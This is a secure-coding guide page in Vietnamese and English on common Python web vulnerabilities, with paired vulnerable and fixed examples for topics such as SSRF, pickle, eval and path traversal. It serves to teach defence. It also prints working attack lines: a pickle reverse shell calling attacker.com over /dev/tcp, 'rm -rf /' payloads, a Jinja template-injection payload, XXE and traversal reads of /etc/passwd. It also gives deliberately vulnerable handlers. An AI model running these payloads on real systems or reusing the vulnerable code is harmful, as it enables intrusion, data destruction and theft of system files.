Giao diện
Common Vulnerabilities Security
Hiểu các lỗ hổng phổ biến để không bao giờ mắc phải chúng
Learning Outcomes
Sau khi hoàn thành trang này, bạn sẽ:
- 🎯 Hiểu OWASP Top 10 và cách áp dụng cho Python
- 🎯 Nhận biết nguy hiểm của pickle và deserialization
- 🎯 Tránh eval() và code injection risks
- 🎯 Phòng chống Path Traversal attacks
- 🎯 Identify và fix các Production Pitfalls bảo mật
OWASP Top 10 cho Python
OWASP Top 10 là danh sách 10 lỗ hổng bảo mật web phổ biến nhất. Đây là cách chúng áp dụng cho Python.
┌─────────────────────────────────────────────────────────────┐
│ A01: Broken Access Control │
│ A02: Cryptographic Failures │
│ A03: Injection │
│ A04: Insecure Design │
│ A05: Security Misconfiguration │
│ A06: Vulnerable Components │
│ A07: Identification & Authentication Failures │
│ A08: Software & Data Integrity Failures │
│ A09: Security Logging & Monitoring Failures │
│ A10: Server-Side Request Forgery (SSRF) │
└─────────────────────────────────────────────────────────────┘
A01: Broken Access Control
python
from fastapi import FastAPI, Depends, HTTPException
from typing import Optional
app = FastAPI()
# ❌ VULNERABLE: No authorization check
@app.get("/users/{user_id}/profile")
async def get_profile_bad(user_id: int):
return get_user_profile(user_id) # Anyone can access any profile!
# ❌ VULNERABLE: Insecure Direct Object Reference (IDOR)
@app.delete("/documents/{doc_id}")
async def delete_document_bad(doc_id: int):
delete_document(doc_id) # No ownership check!
return {"deleted": doc_id}python
# ✅ SECURE: Proper authorization
from fastapi import Depends
from models import User, Document
async def get_current_user(token: str = Depends(oauth2_scheme)) -> User:
"""Verify token and return current user."""
user = verify_token(token)
if not user:
raise HTTPException(status_code=401, detail="Invalid token")
return user
@app.get("/users/{user_id}/profile")
async def get_profile_good(
user_id: int,
current_user: User = Depends(get_current_user)
):
# Check if user can access this profile
if current_user.id != user_id and not current_user.is_admin:
raise HTTPException(status_code=403, detail="Access denied")
return get_user_profile(user_id)
@app.delete("/documents/{doc_id}")
async def delete_document_good(
doc_id: int,
current_user: User = Depends(get_current_user)
):
document = get_document(doc_id)
if not document:
raise HTTPException(status_code=404, detail="Document not found")
# Verify ownership
if document.owner_id != current_user.id and not current_user.is_admin:
raise HTTPException(status_code=403, detail="Not your document")
delete_document(doc_id)
return {"deleted": doc_id}A03: Injection
python
# SQL Injection - covered in validation.md
# Command Injection - covered in validation.md
# Template Injection
from jinja2 import Environment, BaseLoader, select_autoescape
# ❌ VULNERABLE: User input in template
def render_bad(user_input: str) -> str:
template = Environment(loader=BaseLoader()).from_string(user_input)
return template.render()
# Attack: {{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
# ✅ SECURE: Autoescape and sandboxed environment
from jinja2.sandbox import SandboxedEnvironment
def render_good(template_str: str, context: dict) -> str:
env = SandboxedEnvironment(
loader=BaseLoader(),
autoescape=select_autoescape(['html', 'xml'])
)
template = env.from_string(template_str)
return template.render(**context)A05: Security Misconfiguration
python
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
app = FastAPI()
# ❌ VULNERABLE: Overly permissive CORS
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # Allows ANY origin!
allow_credentials=True, # With credentials = very dangerous
allow_methods=["*"],
allow_headers=["*"],
)
# ✅ SECURE: Specific origins
import os

# Origins that may call the API with credentials in production.
ALLOWED_ORIGINS = [
    "https://myapp.com",
    "https://admin.myapp.com",
]
# Parse the flag explicitly: os.environ.get("DEBUG") on its own is truthy for
# ANY non-empty value, so DEBUG=false or DEBUG=0 would still allow localhost.
if os.environ.get("DEBUG", "").strip().lower() in {"1", "true", "yes", "on"}:
    ALLOWED_ORIGINS.append("http://localhost:3000")
app.add_middleware(
CORSMiddleware,
allow_origins=ALLOWED_ORIGINS,
allow_credentials=True,
allow_methods=["GET", "POST", "PUT", "DELETE"],
allow_headers=["Authorization", "Content-Type"],
)
python
# ❌ VULNERABLE: Debug mode in production
from flask import Flask
app = Flask(__name__)
app.run(debug=True) # Exposes debugger, allows code execution!
# ✅ SECURE: Environment-based configuration
import os
DEBUG = os.environ.get("FLASK_DEBUG", "false").lower() == "true"
app.run(debug=DEBUG) # Only True in developmentA06: Vulnerable Components
python
# Check for known vulnerabilities in dependencies
# Using pip-audit
# $ pip-audit
# Found 2 known vulnerabilities in 1 package
# Using safety
# $ safety check
# +==============================================================================+
# | REPORT |
# +==============================================================================+
# | package: requests |
# | installed: 2.25.0 |
# | affected: <2.31.0 |
# | id: 58755 |
# +==============================================================================+
# Automated in CI/CD
# .github/workflows/security.yml
"""
name: Security Scan
on: [push, pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.12'
- run: pip install pip-audit
- run: pip-audit -r requirements.txt --require-hashes --strict
"""A10: Server-Side Request Forgery (SSRF)
python
import requests
from urllib.parse import urlparse
# ❌ VULNERABLE: Fetch any URL user provides
@app.post("/fetch-url")
async def fetch_url_bad(url: str):
response = requests.get(url) # Can access internal services!
return {"content": response.text}
# Attack: url = "http://169.254.169.254/latest/meta-data/"
# Accesses AWS metadata service!
# ✅ SECURE: Validate and restrict URLs
import ipaddress
import socket
ALLOWED_SCHEMES = {"http", "https"}
# Cheap textual pre-filter only; the resolved-address checks are authoritative,
# because many different spellings and DNS names map to the same internal IP.
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}
BLOCKED_NETWORKS = [
    ipaddress.ip_network("0.0.0.0/8"),       # "This network" / unspecified
    ipaddress.ip_network("10.0.0.0/8"),      # Private
    ipaddress.ip_network("100.64.0.0/10"),   # Carrier-grade NAT
    ipaddress.ip_network("127.0.0.0/8"),     # Loopback
    ipaddress.ip_network("169.254.0.0/16"),  # Link-local (AWS metadata)
    ipaddress.ip_network("172.16.0.0/12"),   # Private
    ipaddress.ip_network("192.168.0.0/16"),  # Private
    ipaddress.ip_network("::1/128"),         # IPv6 loopback
    ipaddress.ip_network("fc00::/7"),        # IPv6 unique local
    ipaddress.ip_network("fe80::/10"),       # IPv6 link-local
]


def _is_blocked_ip(ip: "ipaddress.IPv4Address | ipaddress.IPv6Address") -> bool:
    """Return True if *ip* must never be contacted by a server-side fetch."""
    # Judge ::ffff:a.b.c.d by its embedded IPv4 address so the IPv4 rules apply.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    if (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    ):
        return True
    # Compare only against networks of the same IP version.
    return any(
        ip.version == network.version and ip in network
        for network in BLOCKED_NETWORKS
    )


def is_safe_url(url: str) -> bool:
    """Check if URL is safe to fetch.

    The URL is accepted only when its scheme is in ALLOWED_SCHEMES, its host
    is not in BLOCKED_HOSTS, and every address the host resolves to (IPv4 and
    IPv6) is outside the loopback, private, link-local, multicast, reserved
    and unspecified ranges as well as BLOCKED_NETWORKS.

    Args:
        url: User-supplied URL.

    Returns:
        True if the URL passed every check, False otherwise. Any parsing or
        resolution failure is treated as unsafe (fail closed).

    Note:
        This validates the address seen at check time. The HTTP client
        resolves the name again and may follow redirects, so callers should
        disable or re-validate redirects and ideally connect to the address
        that was validated here.
    """
    try:
        parsed = urlparse(url)
    except ValueError:
        # e.g. malformed IPv6 literal
        return False

    # Check scheme
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False

    # Check hostname
    hostname = parsed.hostname
    if not hostname or hostname in BLOCKED_HOSTS:
        return False

    # Resolve hostname (all address families) and check every IP
    try:
        infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
        addresses = [ipaddress.ip_address(info[4][0]) for info in infos]
    except (OSError, ValueError):
        # Resolution failure, undecodable hostname or unparsable address.
        return False

    if not addresses:
        return False
    return not any(_is_blocked_ip(address) for address in addresses)
@app.post("/fetch-url")
async def fetch_url_good(url: str):
if not is_safe_url(url):
raise HTTPException(status_code=400, detail="URL not allowed")
response = requests.get(url, timeout=10)
return {"content": response.text[:10000]} # Limit response sizePickle Dangers
pickle là một trong những lỗ hổng nguy hiểm nhất trong Python. KHÔNG BAO GIỜ unpickle data từ nguồn không tin cậy.
The Problem
python
import pickle
# Pickle có thể execute arbitrary code khi unpickle
class Exploit:
def __reduce__(self):
import os
return (os.system, ("rm -rf /",)) # Executes on unpickle!
# ❌ VULNERABLE: Unpickle user data
@app.post("/load-data")
async def load_data_bad(data: bytes):
obj = pickle.loads(data) # ARBITRARY CODE EXECUTION!
return {"loaded": str(obj)}
# Attack: Attacker sends pickled Exploit object
# Server executes: os.system("rm -rf /")Real Attack Example
python
import pickle
import base64
# Attacker creates malicious pickle
class ReverseShell:
def __reduce__(self):
import subprocess
return (
subprocess.Popen,
(["bash", "-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],)
)
# Serialize and encode
payload = base64.b64encode(pickle.dumps(ReverseShell()))
print(payload) # Send this to vulnerable endpoint
# When server unpickles: reverse shell to attacker!Safe Alternatives
python
import json
from typing import Any
# ✅ SAFE: Use JSON for untrusted data
@app.post("/load-data")
async def load_data_good(data: str):
try:
obj = json.loads(data) # Only parses data, no code execution
return {"loaded": obj}
except json.JSONDecodeError:
raise HTTPException(status_code=400, detail="Invalid JSON")
# ✅ SAFE: Use Pydantic for structured data
from pydantic import BaseModel
class UserData(BaseModel):
name: str
age: int
tags: list[str]
@app.post("/load-user")
async def load_user(data: UserData):
return {"user": data.model_dump()}If You Must Use Pickle
python
import pickle
import hmac
import hashlib
# Placeholder for the example only: load the real key from configuration or a
# secret store, never from source code.
SECRET_KEY = b"your-secret-key-here"
# Length in bytes of an HMAC-SHA256 tag (32); derived rather than hard-coded
# so the framing stays correct if the digest is ever changed.
_SIGNATURE_SIZE = hashlib.sha256().digest_size


def _sign(data: bytes) -> bytes:
    """Return the HMAC-SHA256 tag of *data* under SECRET_KEY."""
    return hmac.new(SECRET_KEY, data, hashlib.sha256).digest()


def secure_pickle_dumps(obj: Any) -> bytes:
    """Pickle with HMAC signature.

    Args:
        obj: Object to serialize.

    Returns:
        The signature followed by the pickled payload.
    """
    data = pickle.dumps(obj)
    return _sign(data) + data


def secure_pickle_loads(signed_data: bytes) -> Any:
    """Unpickle with signature verification.

    Args:
        signed_data: Bytes produced by secure_pickle_dumps.

    Returns:
        The deserialized object.

    Raises:
        ValueError: If the input is shorter than a signature or the
            signature does not match the payload.
    """
    if len(signed_data) < _SIGNATURE_SIZE:
        raise ValueError("Invalid data")
    signature = signed_data[:_SIGNATURE_SIZE]
    data = signed_data[_SIGNATURE_SIZE:]
    # Constant-time comparison so the check does not leak how many leading
    # bytes of a forged signature were correct.
    if not hmac.compare_digest(signature, _sign(data)):
        raise ValueError("Invalid signature - data may be tampered")
    # SECURITY: pickle.loads can execute arbitrary code. It is reached only
    # after the signature check, so it is only as safe as SECRET_KEY is secret.
    return pickle.loads(data)
# ⚠️ WARNING: This only prevents tampering, not malicious internal data!
# Only use for data YOU created, never for user inputPickle Alternatives Comparison
| Format | Safe for Untrusted? | Preserves Types? | Human Readable? |
|---|---|---|---|
| pickle | ❌ NO | ✅ Yes | ❌ No |
| JSON | ✅ Yes | ❌ Basic only | ✅ Yes |
| MessagePack | ✅ Yes | ❌ Basic only | ❌ No |
| Protocol Buffers | ✅ Yes | ✅ Schema-defined | ❌ No |
| YAML | ⚠️ Careful | ❌ Basic only | ✅ Yes |
eval() and exec() Risks
eval() và exec() execute arbitrary Python code. KHÔNG BAO GIỜ dùng với user input.
The Problem
python
# ❌ VULNERABLE: eval() with user input
@app.get("/calculate")
async def calculate_bad(expression: str):
result = eval(expression) # ARBITRARY CODE EXECUTION!
return {"result": result}
# Attack: expression = "__import__('os').system('rm -rf /')"
# Server executes: os.system('rm -rf /')
# ❌ VULNERABLE: exec() with user input
@app.post("/run-code")
async def run_code_bad(code: str):
exec(code) # ARBITRARY CODE EXECUTION!
return {"status": "executed"}Safe Alternatives
python
# ✅ SAFE: Use ast.literal_eval for simple expressions
import ast
def safe_eval(expression: str) -> Any:
    """Safely evaluate literal expressions only.

    Args:
        expression: Source text of a Python literal (string, bytes, number,
            tuple, list, dict, set, boolean or None).

    Returns:
        The value of the literal.

    Raises:
        ValueError: If the text is not a valid literal.
    """
    try:
        return ast.literal_eval(expression)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        # literal_eval documents all of these for malformed input; e.g.
        # "{[1]: 2}" raises TypeError (unhashable key). Normalise them so
        # callers only have to handle ValueError.
        raise ValueError("Invalid expression") from exc
# Only allows: strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None
safe_eval("[1, 2, 3]") # OK: [1, 2, 3]
safe_eval("{'a': 1}") # OK: {'a': 1}
# safe_eval("__import__('os')") # ValueError!
# ✅ SAFE: Use a math expression parser
# pip install simpleeval
from simpleeval import simple_eval
@app.get("/calculate")
async def calculate_good(expression: str):
try:
# Only allows math operations
result = simple_eval(expression)
return {"result": result}
except Exception:
raise HTTPException(status_code=400, detail="Invalid expression")
# simple_eval("2 + 2") # OK: 4
# simple_eval("10 * (5 + 3)") # OK: 80
# simple_eval("__import__('os')") # NameNotDefined errorIf You Must Execute Dynamic Code
python
# ✅ SAFER: Restricted execution environment
import ast
from typing import Any
# Names an expression may reference in addition to caller-supplied variables.
ALLOWED_NAMES = {
    'abs': abs,
    'min': min,
    'max': max,
    'sum': sum,
    'len': len,
    'round': round,
    'True': True,
    'False': False,
    'None': None,
}
# Exact AST node types an expression may contain; anything else is rejected.
# ast.Num is intentionally absent: it was removed in Python 3.12 and literals
# are ast.Constant on every version since 3.8.
ALLOWED_NODES = {
    ast.Expression,
    ast.BinOp,
    ast.UnaryOp,
    ast.Compare,
    ast.Call,  # further restricted to ALLOWED_NAMES functions below
    ast.Constant,
    ast.Name,
    ast.Load,
    ast.Add, ast.Sub, ast.Mult, ast.Div,
    ast.UAdd, ast.USub, ast.Not,  # without these UnaryOp could never pass
    ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
}


def restricted_eval(expression: str, variables: dict = None) -> Any:
    """
    Evaluate expression with restricted operations.

    Only arithmetic (+, -, *, /), unary +/-/not, comparisons, literals, names
    from ALLOWED_NAMES or ``variables``, and positional calls to the functions
    in ALLOWED_NAMES are accepted.

    Args:
        expression: Math/logic expression
        variables: Additional allowed variables

    Returns:
        Evaluation result

    Raises:
        ValueError: If the expression has invalid syntax or uses a construct
            that is not allowed.
        NameError: If the expression references a name that is neither in
            ALLOWED_NAMES nor in ``variables``.
    """
    # Parse to AST
    try:
        tree = ast.parse(expression, mode='eval')
    except SyntaxError as exc:
        raise ValueError("Invalid syntax") from exc

    # Build namespace
    namespace = ALLOWED_NAMES.copy()
    if variables:
        namespace.update(variables)

    # Validate all nodes are allowed
    for node in ast.walk(tree):
        # Exact type match on purpose: this is an allow-list, not a hierarchy.
        if type(node) not in ALLOWED_NODES:
            raise ValueError(f"Operation not allowed: {type(node).__name__}")
        if isinstance(node, ast.Call):
            target = node.func
            # Only the built-in helpers may be called, by bare name, and only
            # if the caller has not replaced them through ``variables``.
            callable_ok = (
                isinstance(target, ast.Name)
                and target.id in ALLOWED_NAMES
                and namespace.get(target.id) is ALLOWED_NAMES[target.id]
            )
            if not callable_ok:
                raise ValueError(f"Operation not allowed: {type(node).__name__}")

    # Evaluate with builtins removed so only the namespace is reachable.
    code = compile(tree, '<string>', 'eval')
    return eval(code, {"__builtins__": {}}, namespace)
# Usage
result = restricted_eval("x + y * 2", {"x": 10, "y": 5}) # 20
# restricted_eval("__import__('os')") # ValueError!Path Traversal
Path traversal cho phép attacker truy cập files ngoài thư mục cho phép.
The Problem
python
from pathlib import Path
# ❌ VULNERABLE: Direct path concatenation
@app.get("/files/{filename}")
async def get_file_bad(filename: str):
filepath = f"/var/www/uploads/{filename}"
return FileResponse(filepath)
# Attack: filename = "../../../etc/passwd"
# Accesses: /var/www/uploads/../../../etc/passwd = /etc/passwd
# ❌ VULNERABLE: Even with Path
@app.get("/files/{filename}")
async def get_file_still_bad(filename: str):
base = Path("/var/www/uploads")
filepath = base / filename # Still vulnerable!
return FileResponse(filepath)Safe File Access
python
from pathlib import Path
from fastapi import HTTPException
from fastapi.responses import FileResponse
BASE_DIR = Path("/var/www/uploads").resolve()
def safe_path(base: Path, user_path: str) -> Path:
    """
    Safely resolve user-provided path within base directory.

    Args:
        base: Base directory. It is resolved here, so a relative or
            symlinked base is compared in the same canonical form as the
            candidate path.
        user_path: User-provided path component

    Returns:
        Safe resolved path

    Raises:
        ValueError: If the path is invalid or escapes base directory
    """
    # Resolve both sides to absolute, symlink-free paths. RuntimeError covers
    # symlink loops on Python versions that report them that way.
    try:
        root = base.resolve()
        full_path = (root / user_path).resolve()
    except (OSError, ValueError, RuntimeError) as exc:
        raise ValueError("Invalid path") from exc

    # Ensure path is within base directory
    try:
        full_path.relative_to(root)
    except ValueError:
        raise ValueError("Path traversal detected") from None
    return full_path
@app.get("/files/{filename:path}")
async def get_file_good(filename: str):
try:
filepath = safe_path(BASE_DIR, filename)
except ValueError as e:
raise HTTPException(status_code=400, detail=str(e))
if not filepath.exists():
raise HTTPException(status_code=404, detail="File not found")
if not filepath.is_file():
raise HTTPException(status_code=400, detail="Not a file")
return FileResponse(filepath)Additional Path Security
python
from pathlib import Path
import os
import stat
def secure_file_access(
    base_dir: Path,
    user_path: str,
    allowed_extensions: set[str] = None,
    max_size: int = None
) -> Path:
    """
    Comprehensive secure file access.

    Args:
        base_dir: Base directory
        user_path: User-provided path
        allowed_extensions: Set of allowed extensions (e.g., {'.txt', '.pdf'});
            None or an empty set disables the check
        max_size: Maximum file size in bytes; None disables the check, 0
            rejects every non-empty file

    Returns:
        Safe file path (absolute, with symlinks resolved)

    Raises:
        ValueError: If any security check fails
    """
    # 1. Resolve path safely. resolve() follows every symlink, so the result
    #    is the real target. RuntimeError covers symlink loops on Python
    #    versions that report them that way.
    base = base_dir.resolve()
    try:
        filepath = (base / user_path).resolve()
    except (OSError, ValueError, RuntimeError) as exc:
        raise ValueError("Invalid path") from exc

    # 2. Check path is within base. Because filepath is already the resolved
    #    target, this also rejects symlinks that point outside the base; a
    #    separate is_symlink() test on the resolved path could never fire.
    try:
        filepath.relative_to(base)
    except ValueError:
        raise ValueError("Path traversal detected") from None

    # 3. Check file exists and is regular file
    if not filepath.exists():
        raise ValueError("File not found")
    if not filepath.is_file():
        raise ValueError("Not a regular file")

    # 4. Check extension
    if allowed_extensions:
        if filepath.suffix.lower() not in allowed_extensions:
            raise ValueError(f"Extension not allowed: {filepath.suffix}")

    # 5. Check file size ("is not None" so that a limit of 0 is enforced)
    if max_size is not None:
        file_size = filepath.stat().st_size
        if file_size > max_size:
            raise ValueError(f"File too large: {file_size} bytes")

    # 6. Check file permissions (optional - ensure readable)
    if not os.access(filepath, os.R_OK):
        raise ValueError("File not readable")
    return filepath
# Usage
filepath = secure_file_access(
base_dir=Path("/var/www/uploads"),
user_path="documents/report.pdf",
allowed_extensions={".pdf", ".txt", ".docx"},
max_size=10 * 1024 * 1024 # 10MB
)Other Common Vulnerabilities
XML External Entity (XXE)
python
import xml.etree.ElementTree as ET
# ❌ RISKY: stdlib XML parsers are not hardened against malicious input (entity-expansion DoS such as "billion laughs"; external entities with some parsers)
def parse_xml_bad(xml_string: str):
return ET.fromstring(xml_string)
# Attack payload:
"""
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""
# ✅ SAFE: Use defusedxml
from defusedxml import ElementTree as SafeET
def parse_xml_good(xml_string: str):
return SafeET.fromstring(xml_string)
# Raises EntitiesForbidden if external entities detectedYAML Deserialization
python
import yaml
# ❌ VULNERABLE: yaml.load() can execute code
def load_yaml_bad(yaml_string: str):
return yaml.load(yaml_string) # Unsafe!
# Attack payload:
"""
!!python/object/apply:os.system
args: ['rm -rf /']
"""
# ✅ SAFE: Use safe_load
def load_yaml_good(yaml_string: str):
return yaml.safe_load(yaml_string)
# Only loads basic Python typesRegular Expression Denial of Service (ReDoS)
python
import re
# ❌ VULNERABLE: Catastrophic backtracking
evil_patterns = [
r'^(a+)+$', # Nested quantifiers
r'^([a-zA-Z]+)*$', # Nested quantifiers
r'^(a|a)+$', # Overlapping alternatives
]
# Attack: 'a' * 30 + 'b' causes exponential time
# ✅ SAFE: Use atomic groups or possessive quantifiers
# Or use google-re2 library
import re2 # pip install google-re2
def safe_regex_match(pattern: str, text: str) -> bool:
"""Match regex with guaranteed linear time."""
try:
return bool(re2.match(pattern, text))
except re2.error:
return FalseInsecure Randomness
python
import random
# ❌ VULNERABLE: random module is predictable
def generate_token_bad():
return ''.join(random.choices('abcdef0123456789', k=32))
# Attacker can predict future tokens if they know seed
# ✅ SAFE: Use secrets module
import secrets
def generate_token_good():
return secrets.token_hex(16) # Cryptographically secureProduction Pitfalls
Pitfall 1: Trusting Client-Side Validation
python
# ❌ BUG: Only validating on frontend
# Frontend: if (age < 0) showError("Invalid age")
# Backend assumes frontend validated
@app.post("/users")
async def create_user_bad(data: dict):
user = User(**data) # No validation!
db.add(user)
return user
# ✅ FIX: Always validate on backend
# EmailStr must be imported explicitly (pydantic needs the optional
# "email-validator" package for it); without the import the class body
# raises NameError.
from pydantic import BaseModel, EmailStr, Field


class UserCreate(BaseModel):
    """Request body for creating a user, validated on the backend."""

    # Non-empty display name, at most 100 characters.
    name: str = Field(..., min_length=1, max_length=100)
    # Age in years, limited to 0-150 inclusive.
    age: int = Field(..., ge=0, le=150)
    # Syntactically valid e-mail address.
    email: EmailStr
@app.post("/users")
async def create_user_good(data: UserCreate):
user = User(**data.model_dump())
db.add(user)
return userPitfall 2: Information Disclosure in Errors
python
# ❌ BUG: Exposing internal details
@app.get("/users/{user_id}")
async def get_user_bad(user_id: int):
try:
return db.query(User).filter(User.id == user_id).one()
except Exception as e:
raise HTTPException(status_code=500, detail=str(e))
# Exposes: "sqlalchemy.exc.NoResultFound: No row was found..."
# ✅ FIX: Generic error messages
import logging
logger = logging.getLogger(__name__)
@app.get("/users/{user_id}")
async def get_user_good(user_id: int):
try:
user = db.query(User).filter(User.id == user_id).first()
if not user:
raise HTTPException(status_code=404, detail="User not found")
return user
except HTTPException:
raise
except Exception as e:
logger.exception(f"Error fetching user {user_id}") # Log details
raise HTTPException(status_code=500, detail="Internal server error")Pitfall 3: Mass Assignment
python
# ❌ BUG: Accepting all fields
@app.put("/users/{user_id}")
async def update_user_bad(user_id: int, data: dict):
user = get_user(user_id)
for key, value in data.items():
setattr(user, key, value) # Can set is_admin=True!
db.commit()
# ✅ FIX: Explicit allowed fields
class UserUpdate(BaseModel):
name: Optional[str] = None
email: Optional[EmailStr] = None
# is_admin NOT included
@app.put("/users/{user_id}")
async def update_user_good(user_id: int, data: UserUpdate):
user = get_user(user_id)
update_data = data.model_dump(exclude_unset=True)
for key, value in update_data.items():
setattr(user, key, value)
db.commit()Pitfall 4: Timing Attacks
python
# ❌ BUG: Early return reveals information
def verify_password_bad(provided: str, stored: str) -> bool:
    """Compare two secrets with an early-exit loop (INSECURE demonstration).

    Kept deliberately vulnerable to timing attacks to illustrate the pitfall;
    use a constant-time comparison such as hmac.compare_digest in real code.
    The second parameter was previously declared as ``stored_str`` while the
    body read ``stored``, so every call raised NameError.

    Args:
        provided: Value supplied by the client.
        stored: Reference value to compare against.

    Returns:
        True if both strings are identical, False otherwise.
    """
    if len(provided) != len(stored):
        return False  # Reveals password length!
    for a, b in zip(provided, stored):
        if a != b:
            return False  # Early exit reveals position
    return True
# ✅ FIX: Constant-time comparison
import hmac
def verify_password_good(provided: str, stored: str) -> bool:
return hmac.compare_digest(provided.encode(), stored.encode())Quick Reference
python
# === NEVER DO ===
pickle.loads(untrusted_data) # Arbitrary code execution
eval(user_input) # Arbitrary code execution
exec(user_input) # Arbitrary code execution
yaml.load(untrusted_yaml) # Use yaml.safe_load()
os.system(f"cmd {user_input}") # Command injection
# === ALWAYS DO ===
# Parameterized queries
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Safe path handling
safe_path = (base_dir / user_path).resolve()
safe_path.relative_to(base_dir) # Raises if outside
# Constant-time comparison
secrets.compare_digest(a, b)
# Safe XML parsing
from defusedxml import ElementTree
ElementTree.fromstring(xml_data)
# Safe YAML parsing
yaml.safe_load(yaml_data)Cross-links
- Prerequisites: Input Validation
- Related: Secrets Management - Credential security
- See Also: Secure Coding Patterns - Best practices
- See Also: API Design - Secure API patterns